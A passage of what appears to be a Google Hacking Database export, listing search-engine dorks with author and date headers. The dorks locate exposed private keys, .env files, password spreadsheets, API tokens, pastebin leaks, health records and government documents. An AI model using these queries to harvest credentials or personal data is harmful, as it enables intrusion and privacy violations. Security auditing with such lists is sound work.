(Turku)\r\nCyber Sec researcher"}, {"dork": "inurl:ALFA_DATA intitle:\"index of\"", "description": "# Google Dork: inurl:ALFA_DATA intitle:\"index of\"\r\n\r\n# Files Containing Juicy Info.\r\n\r\n# Date: 08/06/2021\r\n\r\n# Exploit Author: Snowglobe_io"}, {"dork": "inurl:/wp-content/uploads/ \"phpMyAdmin SQL Dump\"", "description": "# Google Dork: inurl:/wp-content/uploads/ \"phpMyAdmin SQL Dump\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Robotshell"}, {"dork": "inurl:/wp-content/uploads/wpdm-cache", "description": "# Google Dork: inurl:/wp-content/uploads/wpdm-cache\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Aftab Alam"}, {"dork": "site:*/phpmyadmin/server_databases.php", "description": "# Google Dork: site:*/phpmyadmin/server_databases.php\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Reza Abasi"}, {"dork": "index of storage/oauth-private.key", "description": "# Google Dork: index of storage/oauth-private.key\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Osman Arif"}, {"dork": "intitle:\"index of\" \"db.sqlite3\"", "description": "# Google Dork: intitle:\"index of\" \"db.sqlite3\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"/sql\"", "description": "# Google Dork: intitle:\"index of\" \"/sql\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"ssh_host_rsa_key\" + \"ssh_host_rsa_key.pub\"", "description": "# Google Dork: intitle:\"index of\" \"ssh_host_rsa_key\" + \"ssh_host_rsa_key.pub\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Date: 23/07/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Not for Public Release\" + \"Confidential\" ext:pdf | ext:doc | ext:xlsx", "description": "# Google Dork: \"Not for Public Release\" + \"Confidential\" ext:pdf | ext:doc\r\n| ext:xlsx\r\n\r\n# Files containing juicy info.\r\n\r\n# Date: 8/08/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/inicis/ ext:log", "description": "# Google Dork: inurl:/inicis/ ext:log\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:wp-content/plugins/modern-events-calendar-lite", "description": "# Google Dork: inurl:wp-content/plugins/modern-events-calendar-lite\r\n# Date: 03/08/2021\r\n# Exploit Author: Pratik Gaikwad"}, {"dork": "intitle:untitled filetype:xls intext:password", "description": "# Google Dork: intitle:untitled filetype:xls intext:password\r\n# Files Containing Juicy Info\r\n# Date: 24/08/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "filetype:xlsx intext:\"gmail.com\" OR \"hotmail.com\" site:gov", "description": "# Google Dork: filetype:xlsx intext:\"gmail.com\" OR \"hotmail.com\" site:gov\r\n# Files Containing Juicy Info\r\n# Date: 04/09/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "allintext:adhaar filetype:xlsx", "description": "# Google Dork: allintext:adhaar filetype:xlsx\r\n# Files Containing Juicy Info\r\n# Date: 04/09/2021 \r\n# Exploit Author: Seecko Das"}, {"dork": "intext:\"SECRET_KEY=\" site:pastebin.com", "description": "# Google Dork: intext:\"SECRET_KEY=\" site:pastebin.com\r\n# Files Containing Juicy Info\r\n# Date: 24/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intext:\"private_key=\" site:pastebin.com", "description": "# Google Dork: intext:\"private_key=\" site:pastebin.com\r\n# Files Containing Juicy Info\r\n# Date: 24/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"/webpack-dev-server/ssl/\"", "description": "# Google Dork: intitle:\"index of\" \"/webpack-dev-server/ssl/\"\r\n# Files Containing Juicy info\r\n# Date: 23/07/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/wp-content/uploads/\"", "description": "# Google Dork: intitle:\"index of\" \"/wp-content/uploads/\"\r\n# Files Containing Juicy Info\r\n# Date: 23/07/2021 \r\n# Exploit Author: Chrish"}, {"dork": "intext:\"API KEY\" site:pastebin.com", "description": "# Google Dork: intext:\"API KEY\" site:pastebin.com\r\n# Files Containing Juicy Info\r\n# Date: 24/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Index of\" service.pwd", "description": "#Google Dork : intitle:\"Index of\" service.pwd\r\n#Description: Files Containing Juicy Info\r\n#Date: 02/08/2021\r\n#Exploit Author : Tanvir Imon"}, {"dork": "inurl:gov filetype:xls intext:password", "description": "# Google Dork: inurl:gov filetype:xls intext:password\r\n# Files Containing Juicy Info\r\n# Date: 16/09/2021 \r\n# Exploit Author: Cyber Shelby"}, {"dork": "intitle:\"index of\" \"irc.log\" | \"irc.logs\"", "description": "# Google Dork: intitle:\"index of\" \"irc.log\" | \"irc.logs\"\r\n# Files Containing Juicy Info\r\n# Date: 16/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/phpmyadmin/import.php", "description": "# Google Dork: site:*/phpmyadmin/import.php\r\n# Files Containing Juicy Info\r\n# Date:14/09/2021\r\n# Exploit Author: Reza Abasi"}, {"dork": "site:*/phpmyadmin/server_import.php", "description": "# Google Dork: site:*/phpmyadmin/server_import.php\r\n# Files Containing Juicy info\r\n# Date:14/09/2021\r\n# Exploit Author: Reza Abasi"}, {"dork": "intext:\"Welcome to Huawei web page for network configuration.\"", "description": "# Google Dork: intext:\"Welcome to Huawei web page for network configuration.\"\r\n# Files Containing Juicy Info\r\n# Date:31/08/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle: index of /bin/php.ini", "description": "# Google Dork: intitle: index of /bin/php.ini\r\n# Files Containing Juicy Info\r\n# Date:05/09/2021\r\n# Exploit Author: Arpan Chakraborty"}, {"dork": "intitle:\"LiveZilla Server Page\"", "description": "# Google Dork: intitle:\"LiveZilla Server Page\"\r\n# Files Containing Juicy Info\r\n# Date:31/08/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle: \"index of /files clients\"", "description": "# Google Dork: intitle: \"index of /files clients\"\r\n# Files Containing Juicy Info\r\n# Date:14/09/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle:\"index of\" \"database.py\"", "description": "# Google Dork: intitle:\"index of\" \"database.py\"\r\n# Files Containing Juicy Info\r\n# Date:06/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:/_vti_bin/Authentication.asmx", "description": "# Google Dork: inurl:/_vti_bin/Authentication.asmx\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2021\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "ext:txt intext:Windows PowerShell transcript start", "description": "# Google Dork: ext:txt intext:Windows PowerShell transcript start\r\n# Files Containing Juicy Info\r\n# Date:25/06/2021\r\n# Exploit Author: ahmed"}, {"dork": "intitle:\"index of\" \"tls-cert.pem\" | \"tls-csr.pem\" | \"tls-key.pem\"", "description": "# Google Dork: intitle:\"index of\" \"tls-cert.pem\" | \"tls-csr.pem\" | \"tls-key.pem\"\r\n# Juicy information (private keys).\r\n# Date: 23/07/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"development.py\"", "description": "# Google Dork: intitle:\"index of\" \"development.py\"\r\n# Files Containing Juicy Info\r\n# Date:06/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"production.py\"", "description": "# Google Dork: intitle:\"index of\" \"production.py\"\r\n# Files Containing Juicy Info\r\n# Date:06/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"local_settings.py\"", "description": "# Google Dork: intitle:\"index of\" \"local_settings.py\"\r\n# Files Containing Juicy Info\r\n# Date:06/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:/admin/radeditorprovider/dialoghandler.aspx \"Loading the dialog...\"", "description": "# Google Dork: inurl:/admin/radeditorprovider/dialoghandler.aspx \"Loading\r\nthe dialog...\"\r\n# Files Containing Juicy Info\r\n# Date: 30/08/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "phpMyAdmin -www filetype:conf site:*", "description": "# Google Dork: phpMyAdmin -www filetype:conf site:*\r\n# Files Containing Juicy Info\r\n# Date:05/09/2021\r\n# Exploit Author: Varsha Koli"}, {"dork": "Google Dork: intitle:index.of ipconfig", "description": "# Google Dork: intitle:index.of ipconfig\r\n# Files Containing Juicy Info\r\n# Date:21/09/2021\r\n# Exploit Author: Bon Sai"}, {"dork": "intext:\"Powered by SmarterTrack\"", "description": "# Google Dork: intext:\"Powered by SmarterTrack\"\r\n# Files Containing Juicy Info\r\n# Date:24/09/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "inurl:/wp-content/themes/beach_apollo", "description": "# Google Dork: inurl:/wp-content/themes/beach_apollo\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "intitle:GoogleService-Info filetype:plist", "description": "# Google Dork: intitle:GoogleService-Info filetype:plist\r\n# File Containing Juicy Info\r\n# Date: 15/09/2021 \r\n# Exploit Author: Madan Kumawat"}, {"dork": "intitle:\"Index of\" \"build-an-atom\"", "description": "# Google Dork: intitle:\"Index of\" \"build-an-atom\"\r\n# Files Containing Juicy Info\r\n# Date: 18/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"robots\" | \"robot\" intext:\"Disallow:\" | \"Allow:\" ext:txt", "description": "# Dork: inurl:\"robots\" | \"robot\" intext:\"Disallow:\" | \"Allow:\" ext:txt\r\n# Files Containing Juicy Info\r\n# Date: 15/09/2021\r\n# Exploit Author: Aftab Alam\r\n\r\nDescription: This Dork shows all web pages that have a publicly disclosed \u201crobots.txt\u201d file, which contains a list of pages on the particular web server that should not be crawled to be indexed by search engines. By having access to this file, someone could possibly:\r\n\r\n 1. Know the pages that the web server owner intends to hide from search engine results\r\n 2. Know the pages that exist on the web server and are poorly hidden using this technique\r\n 3. Gain access to pages with privileged login portals (administrator, webmaster, etc.)"}, {"dork": "inurl:autodiscover/autodiscover.xml", "description": "# Google Dork: inurl:autodiscover/autodiscover.xml\r\n# Files Containing Juicy Info\r\n# Date:24/09/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"index of\" \"robots.txt\"", "description": "# Google Dork: intitle:\"index of\" \"robots.txt\"\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"index of\" \"development.js\"", "description": "# Google Dork: intitle:\"index of\" \"development.js\"\r\n# Files Containing Juicy Info\r\n# Date:26/09/2021\r\n# Exploit Author: Abhinav Anand"}, {"dork": "intext:Authorization: Bearer filetype:log", "description": "# Google Dork: intext:Authorization: Bearer filetype:log\r\n# Files Containing Juicy Info\r\n# Date: 22/09/2021\r\n# Exploit Autor: Matheus Bolela"}, {"dork": "intitle.index of .env", "description": "# Google Dork: intitle.index of .env\r\n# Files Containing Juicy Info\r\n# Date:24/09/2021\r\n# Exploit Author: Sugavanam D"}, {"dork": "intitle:index.of root user", "description": "# Google Dork: intitle:index.of root user\r\n# Files Containing Juicy Info\r\n# Date:21/09/2021\r\n# Exploit Author: Bon Sai"}, {"dork": "intitle:\"Operations Automation Default Page\"", "description": "# Google Dork: intitle:\"Operations Automation Default Page\"\r\n# Files Containing Juicy Info\r\n# Date:29/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intext:\"Powered by YzmCMS\"", "description": "# Google Dork: intext:\"Powered by YzmCMS\"\r\n# Files Containing Juicy Info\r\n# Date:27/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"sourcecode\"", "description": "# Google Dork: intitle:\"index of\" \"sourcecode\"\r\n# Files Containing Juicy Info\r\n# Date:27/09/2021\r\n# Exploit Author: ethicalsubbu"}, {"dork": "# Exploit Title: [SF Dork]", "description": "# Google Dork: # Exploit Title: [SF Dork]\r\n# Files Containing Juicy Info\r\n# Date:29/09/2021\r\n# Exploit Author: Teddy"}, {"dork": "inurl:/wp-content/themes/striking_r", "description": "# Google Dork: inurl:/wp-content/themes/striking_r\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/themes/avada", "description": "# Google Dork: inurl:/wp-content/themes/avada\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/themes/centum", "description": "# Google Dork: inurl:/wp-content/themes/centum\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/themes/ultimatum", "description": "# Google Dork: inurl:/wp-content/themes/ultimatum\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/themes/IncredibleWP", "description": "# Google Dork: inurl:/wp-content/themes/IncredibleWP\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/plugins/wp-e-commerce", "description": "# Google Dork: inurl:/wp-content/plugins/wp-e-commerce\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "intitle: \"index\" inurl: log", "description": "# Google Dork: intitle: \"index\" inurl: log\r\n# Files Containing Juicy Info\r\n# Date:26/09/2021\r\n# Exploit Author: adreeta maity"}, {"dork": "allintitle:Index of /wp-includes/", "description": "# Google Dork: allintitle:Index of /wp-includes/\r\n# Files Containing Juicy Info\r\n# Date:24/09/2021\r\n# Exploit Author: Raj Zamal"}, {"dork": "intext:private_key filetype:log", "description": "# Google Dork: intext:private_key filetype:log\r\n# Files Containing Juicy Info\r\n# Date:22/09/2021\r\n# Exploit Author: Matheus Bolela"}, {"dork": "intext:api_key filetype:log", "description": "# Google Dork: intext:api_key filetype:log\r\n# Files Containing Juicy Info\r\n# Date:22/09/2021\r\n# Exploit Author: Matheus Bolela"}, {"dork": "inurl: /admin/webeditor/admin_login.asp", "description": "# Google Dork: inurl: /admin/webeditor/admin_login.asp\r\n# Files Containing Juicy Info\r\n# Date:12/09/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "inurl:sap/public/bc", "description": "# Google Dork: inurl:sap/public/bc\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intext:\"docs.google.com/forms/d/\"", "description": "# Google Dork: intext:\"docs.google.com/forms/d/\"\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Rodrigo Ferreira"}, {"dork": "intitle:\" index of \" \"/BigIp\"", "description": "# Google Dork: intitle:\" index of \" \"/BigIp\"\r\n# Files Containing Juicy Info\r\n# Date:26/09/2021\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "intitle:\"index of\" \"robots.txt\"", "description": "# Google Dork: intitle:\"index of\" \"robots.txt\"\r\n# Files Containing Juicy Info\r\n# Date:29/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intext:\"Number of Requests for items accessed on this Server\"", "description": "# Google Dork: intext:\"Number of Requests for items accessed on this Server\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "allintext:\"[Sec. Info]\" file.php", "description": "# Google Dork: allintext:\"[Sec. Info]\" file.php\r\n# Files Containing Juicy Info\r\n# Date:02/08/2021\r\n# Exploit Author: Adam Wallwork"}, {"dork": "allintext:\"Call to undefined function\"", "description": "# Google Dork: allintext:\"Call to undefined function\"\r\n# Files Containing Juicy Info\r\n# Date:02/08/2021\r\n# Exploit Author: Adam Wallwork"}, {"dork": "intitle: \"Index of ipcam\"", "description": "# Google Dork: intitle: \"Index of ipcam\"\r\n# Files Containing Juicy Info\r\n# Date:1/10/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle: \"index of data clinic\"", "description": "# Google Dork: intitle: \"index of data clinic\"\r\n# Files Containing Juicy Info\r\n# Date:01/10/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle:\"index of\" \"mongod.conf\"", "description": "# Google Dork: intitle:\"index of\" \"mongod.conf\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"index of \" inurl:\".bash_profile \"", "description": "# Google Dork: intitle:\"index of \" inurl:\".bash_profile \"\r\n# Files Containing Juicy Info\r\n# Date:21/09/2021\r\n# Exploit Author: Deven Rathod"}, {"dork": "intitle:\"index of\" \"config.json\"", "description": "# Google Dork: intitle:\"index of\" \"config.json\"\r\n# Files Containing Juicy Info\r\n# Date:01/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"index of\" \"docker-compose.yaml\"", "description": "# Google Dork: intitle:\"index of\" \"docker-compose.yaml\"\r\n# Files Containing Juicy Info\r\n# Date:01/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:execute-api site:amazonaws.com", "description": "# Google Dork: inurl:execute-api site:amazonaws.com\r\n# Files Containing Juicy Info\r\n# Date:02/10/2021\r\n# Exploit Author: Juan Christian"}, {"dork": "intitle:index of django.config", "description": "# Google Dork: intitle:index of django.config\r\n# Files Containing Juicy Info\r\n# Date:02/10/2021\r\n# Exploit Author: Asif Mohammad Khan"}, {"dork": "intitle:\"index of\" inurl:gov Juicy Info |GHDB", "description": "# Google Dork: intitle:\"index of\" inurl:gov Juicy Info |GHDB\r\n# Files Containing Juicy Info\r\n# Date:02/10/2021\r\n# Exploit Author: Parul Gulati"}, {"dork": "intitle: \"index of Health Records\"", "description": "# Google Dork: intitle: \"index of Health Records\"\r\n# Files Containing Juicy Info\r\n# Date:01/10/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle:\"index of\" \"/api-debug.log\"", "description": "# Google Dork: intitle:\"index of\" \"/api-debug.log\"\r\n# Files Containing Juicy Info\r\n# Date:11/08/2021\r\n# Exploit Author: Chirag Samant"}, {"dork": "site:pastebin.com intext:\"-----BEGIN CERTIFICATE-----\"", "description": "# Google Dork: site:pastebin.com intext:\"-----BEGIN CERTIFICATE-----\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "site:pastebin.com intext:\"-----BEGIN RSA PRIVATE KEY-----\"", "description": "# Google Dork: site:pastebin.com intext:\"-----BEGIN RSA PRIVATE KEY-----\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "site:pastebin.com intext:\":aad3b435b51404eeaad3b435b51404ee:\"", "description": "# Google Dork: site:pastebin.com intext:\":aad3b435b51404eeaad3b435b51404ee:\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" \"schema.graphql\"", "description": "# Google Dork: intitle:\"index of\" \"schema.graphql\"\r\n# Files Containing Juicy Info\r\n# Date:18/07/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "site:.execute-api.us-east-1.amazonaws.com", "description": "# Google Dork: site:.execute-api.us-east-1.amazonaws.com\r\n# Files Containing Juicy Info\r\n# Date: 24/10/2021 \r\n# Exploit Author: Lutzenfried"}, {"dork": "inurl:employee filetype:xls", "description": "# Google Dork: inurl:employee filetype:xls\r\n# Files Containing Juicy Info\r\n# Date:02/10/2021\r\n# Exploit Author: Ashim Chaudhary"}, {"dork": "ext:xls intext:/etc/passwd | inurl:password", "description": "# Google Dork: ext:xls intext:/etc/passwd | inurl:password\r\n# Files Containing Juicy Info\r\n# Date:22/09/2021\r\n# Exploit Author: Mostafa Tamam"}, {"dork": "\"index of\" intext:wpbdp-csv-exports", "description": "# Google Dork: \"index of\" intext:wpbdp-csv-exports\r\n# Files Containing Juicy Info\r\n# Date:23/09/2021\r\n# Exploit Author: Serdar D."}, {"dork": "inurl:mil intext:\"UNCLASSIFIED/FOUO\" ext:pdf", "description": "# Google Dork: inurl:mil intext:\"UNCLASSIFIED/FOUO\" ext:pdf\r\n# Files Containing Juicy Info\r\n# Date: 03/10/2021 \r\n# Exploit Author: Stuart Steenberg"}, {"dork": "filetype:log \"AUTHTOKEN\"", "description": "# Google Dork: filetype:log \"AUTHTOKEN\"\r\n# Files Containing Juicy Info\r\n# Date:23/09/2021\r\n# Exploit Author: Matheus Bolela"}, {"dork": "intitle:\"index of\" \"mysql.yaml\"", "description": "# Google Dork: intitle:\"index of\" \"mysql.yaml\"\r\n# Files Containing Juicy Info\r\n# Date: 04/10/2021 \r\n# Exploit Author: Suman Das"}, {"dork": "site:*/oauth/token", "description": "# Google Dork: site:*/oauth/token\r\n# Files Containing Juicy Info\r\n# Date:04/10/2021\r\n# Exploit Author: reza abasi"}, {"dork": "intitle:\"index of\" \"sftp.json\"", "description": "# Google Dork: intitle:\"index of\" \"sftp.json\"\r\n# Files Containing Juicy Info\r\n# Date:04/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:simplesaml/saml2/idp", "description": "# Google Dork: inurl:simplesaml/saml2/idp\r\n# Files Containing Juicy Info\r\n# Date: 04/10/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "\".:/opt/remi/php56/root/usr/share/pear\" | \":/opt/remi/php56/root/usr/share/php\"", "description": "# Google Dork: \".:/opt/remi/php56/root/usr/share/pear\" | \":/opt/remi/php56/root/usr/share/php\"\r\n# Files Containing Juicy Info\r\n# Date: 28/09/2021 \r\n# Exploit Author: MiningOmerta\r\n#Description: Path disclosure, outdated PHP version disclosure, service disclosure, and virtualenv within the service disclosure"}, {"dork": "\"boarding pass\" site:http://tripadvisor.com", "description": "# Google Dork: \"boarding pass\" site:http://tripadvisor.com\r\n# Files Containing Juicy Info\r\n# Date:06/10/2021\r\n# Exploit Author: Allan Jay Dumanhug"}, {"dork": "intitle:index de sshd_config", "description": "# Google Dork: intitle:index de sshd_config\r\n# Files Containing Juicy Info\r\n# Date: 06/10/2021 \r\n# Exploit Author: Naman Shah"}, {"dork": "site:pastebin.com intext:root: & :0: & ::: | intitle:passwd | shadow", "description": "# Google Dork: site:pastebin.com intext:root: & :0: & ::: | intitle:passwd | shadow\r\n# Files Containing Juicy Info\r\n# Date: 07/10/2021 \r\n# Exploit Author: Arav Budhiraja"}, {"dork": "intitle:\"Index of\" \"Apache/2.4.49\"", "description": "# Google Dork: intitle:\"Index of\" \"Apache/2.4.49\"\r\n# Files Containing Juicy Info\r\n# Date:08/10/2021\r\n# Exploit Author: Shell Reaper"}, {"dork": "intitle: \"access log\" filetype: txt", "description": "# Google Dork: intitle: \"access log\" filetype: txt\r\n# Files Containing Juicy Info\r\n# Date: 8/10/2021 \r\n# Exploit Author: Zeshan Ahmad"}, {"dork": "intitle:\"index of\" \"credentials\"", "description": "# Google Dork: intitle:\"index of\" \"credentials\"\r\n# Files Containing Juicy Info\r\n# Date:08/10/2021\r\n# Exploit Author: ethicalsubbu"}, {"dork": "site:pastebin.com intitle:\"leak\" | \"breach\" intext:\"password\" | \"pw\" | \"pwd\"", "description": "# Google Dork: site:pastebin.com intitle:\"leak\" | \"breach\" intext:\"password\" | \"pw\" | \"pwd\"\r\n# Files Containing Juicy Info\r\n# Date:08/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "\"Warehouse Management System\" Ext:pdf site:.gov", "description": "# Google Dork: \"Warehouse Management System\" Ext:pdf site:.gov\r\n# Files Containing Juicy Info\r\n# Date:09/10/2021\r\n# Exploit Author: Tyler Draughn"}, {"dork": "intitle: \"index of\" \"admin\" \"/backup\"", "description": "# Google Dork: intitle: \"index of\" \"admin\" \"/backup\"\r\n# Files Containing Juicy Info\r\n# Date:09/10/2021\r\n# Exploit Author: Roshdy Essam"}, {"dork": "intitle: \"Library System by YahooBaba\"", "description": "# Google Dork: intitle: \"Library System by YahooBaba\"\r\n# Files Containing Juicy Info\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "inurl:/wp-content/plugins/thecartpress/", "description": "# Google Dork: inurl:/wp-content/plugins/thecartpress/\r\n# Files Containing Juicy Info\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "inurl:/wp-content/plugins/mstore-api/", "description": "# Google Dork: inurl:/wp-content/plugins/mstore-api/\r\n# Files Containing Juicy Info\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "inurl:/plugins/pie-register/", "description": "# Google Dork: inurl:/plugins/pie-register/\r\n# Files Containing Juicy Info\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "filetype:log intext:(\"apache2\" | \"htdocs\")", "description": "# Google Dork: filetype:log intext:(\"apache2\" | \"htdocs\")\r\n# Files Containing Juicy Info\r\n# Date:09/10/2021\r\n# Exploit Author: Ritik Sahni"}, {"dork": "intext:\"index of/\" \"client-1.0-SNAPSHOT\"", "description": "# Google Dork: intext:\"index of/\" \"client-1.0-SNAPSHOT\"\r\n# Files Containing Juicy Info\r\n# Date:12/10/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"phpinfo()\" inurl:\"phpinfo.php\"", "description": "# Google Dork: intitle:\"phpinfo()\" inurl:\"phpinfo.php\"\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Michael Felix"}, {"dork": "intitle:\"index of\" \"passwords\" gov", "description": "# Google Dork: intitle:\"index of\" \"passwords\" gov\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Syed Sadam"}, {"dork": "New Dork", "description": "# Google Dork: inurl:robots.txt filetype:txt intext:cgi-bin\r\n# Files Containing Juicy Info\r\n# Date:13/10/2021\r\n# Exploit Author: Golam Rabbany"}, {"dork": "intitle:\"Index of\" inurl:data/plugins/", "description": "# Google Dork: intitle:\"Index of\" inurl:data/plugins/\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Chirag Prajapati"}, {"dork": "Google Dork: intitle:\"Index of\" \"Apache/2.4.50\"", "description": "# Google Dork: intitle:\"Index of\" \"Apache/2.4.50\"\r\n# Files Containing Juicy Info\r\n# Date:13/10/2021\r\n# Exploit Author: Roshdy Essam"}, {"dork": "site:*/node_modules/ content:\"ssh\"", "description": "# Google Dork: site:*/node_modules/ content:\"ssh\"\r\n# Files Containing Juicy Info\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "site:*/node_modules/ content:\"PEM\"", "description": "# Google Dork: site:*/node_modules/ content:\"PEM\"\r\n# Files Containing Juicy Info\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"index of\" \"schema.mysql\"", "description": "# Google Dork: intitle:\"index of\" \"schema.mysql\"\r\n# Files Containing Juicy Info\r\n# Date:12/10/2021\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "intitle:\"Pi-hole - raspberrypi\"", "description": "# Google Dork: intitle:\"Pi-hole - raspberrypi\"\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Cristi Vlad"}, {"dork": "inurl:\"/responsible disclosure\"", "description": "# Google Dork: inurl:\"/responsible disclosure\"\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:\"index of\" \"console\"", "description": "# Google Dork: intitle:\"index of\" \"console\"\r\n# Files Containing Juicy Info\r\n# Date: 14/10/2021 \r\n# Exploit Author: ethicalsubbu"}, {"dork": "intitle:\"index of\" \"logs\"", "description": "# Google Dork: intitle:\"index of\" \"logs\"\r\n# Files Containing Juicy Info\r\n# Date:14/10/2021\r\n# Exploit Author: Prakash Ganesh"}, {"dork": "index of / inurl:/pki/", "description": "# Google Dork: index of / inurl:/pki/\r\n# Files Containing Juicy Info\r\n# Date:15/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intext:\"index of/\" \"top secret\" gov", "description": "# Google Dork: intext:\"index of/\" \"top secret\" gov\r\n# Files Containing Juicy Info\r\n# Date:15/10/2021\r\n# Exploit Author: Syed Sadam"}, {"dork": "inurl:/servicedesk/customer/user/signup", "description": "# Google Dork: inurl:/servicedesk/customer/user/signup\r\n# Files Containing Juicy Info\r\n# Date:16/10/2021\r\n# Exploit Author: Aman Rawat"}, {"dork": "inurl:wp-content/plugins/easy-wp-smtp", "description": "# Google Dork: inurl:wp-content/plugins/easy-wp-smtp\r\n# Files Containing Juicy Info\r\n# Date:16/10/2021\r\n# Exploit Author: Pratik Dabhi"}, {"dork": "inurl:\"/app/kibana#\"", "description": "# Google Dork: Re: inurl:\"/app/kibana#\"\r\n# Files Containing Juicy Info\r\n# Date:17/10/2021\r\n# Exploit Author: Sandesh Ajgekar"}, {"dork": "intext:\"adobe coldfusion 8\"", "description": "# Google Dork: intext:\"adobe coldfusion 8\"\r\n# Files Containing Juicy Info\r\n# Date:18/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "Fwd: intitle:\"Authorize application\" \"Learn more about OAuth\"", "description": "# Google Dork: intitle:\"Authorize application\" \"Learn more about OAuth\"\r\n# Files Containing Juicy Info\r\n# Date: 20/10/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, 